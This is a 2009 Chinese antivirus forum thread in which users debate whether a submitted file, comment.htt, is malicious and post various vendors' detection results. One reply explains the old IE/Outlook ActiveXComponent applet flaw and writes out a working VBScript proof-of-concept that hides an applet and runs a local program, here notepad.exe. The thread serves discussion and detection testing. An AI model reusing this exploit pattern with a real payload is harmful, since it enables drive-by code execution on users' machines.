1x

luxiao200888

国内一般都杀

sbbdms

晕了……

Hello,


comment.htt

No malicious code was found in this file.

>From: lovefuwa0411@qq.com
>Sent: Mar 29 2009 12:20PM
>To: "New Virus" <newvirus@kaspersky.com>
>Subject: virus
>
>
>

Best Regards, NewVirus

10/1, 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com

luxiao200888

不会把 ....

Sherry.ai

报告里没找到

sbbdms

我晕，是KLAN.ROBOT回的
它刚刚又回了一封 把我的TDSS全部加上变种了……可恶啊…………

额……不对了……刚刚工程师亲自分析也说NO…………

qianwenxiang

htt中把com.ms.activeX.ActiveXComponent嵌入applet之后没有利用这个漏洞的代码 所以应该不算毒

如果某个恶意的网站管理员将一个特殊构造的java对象嵌入到一个HTML文档中，则当目标机器通过微软IE或Outlook察看该web页面时，可以执行目标机器上的任意程序。插入在<APPLET>标签中的com.ms.activeX.ActiveXComponent java对象将会允许创建和解释执行任意ActiveX对象，即使它们存在安全风险。


即使对Outlook已经使用了“security update”，仍有可能通过使用java来绕过禁止动态脚本解释执行的限制。


恶意的网站管理员可以执行任意程序，这使得他可以获得与目标机器上的当前用户相同的权限。

这样差不多算了

<html><body><script language=vbscript>document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=LHW HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
On Error Resume Next:Set Ap=document.applets("lhw"):Ap.SetCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"):Ap.CreateInstance():Set Wsh=AppleObject.GetObject():Wsh.run("c:\windows\notepad.exe")</script></body></html>

SUZAKU

卡巴斯基杀毒报告

扫描文件数：3

查杀（病毒、木马）数：1

详细杀毒报告列表：

2009-3-29 18:45:35        检测到威胁: HEUR:Exploit.Script.Generic        C:\Documents and Settings\Try\桌面\新建文件夹\comment.zip/comment.htt               
2009-3-29 18:45:35        未处理: HEUR:Exploit.Script.Generic        C:\Documents and Settings\Try\桌面\新建文件夹\comment.zip/comment.htt        延期       
2009-3-29 18:45:35        检测到威胁: HEUR:Exploit.Script.Generic        C:\Documents and Settings\Try\桌面\新建文件夹\comment.zip/comment.htt               

kkgh

费尔 JS.Exception.Exploit

BING126

McAfee miss

ledled

VirusBuster found nothing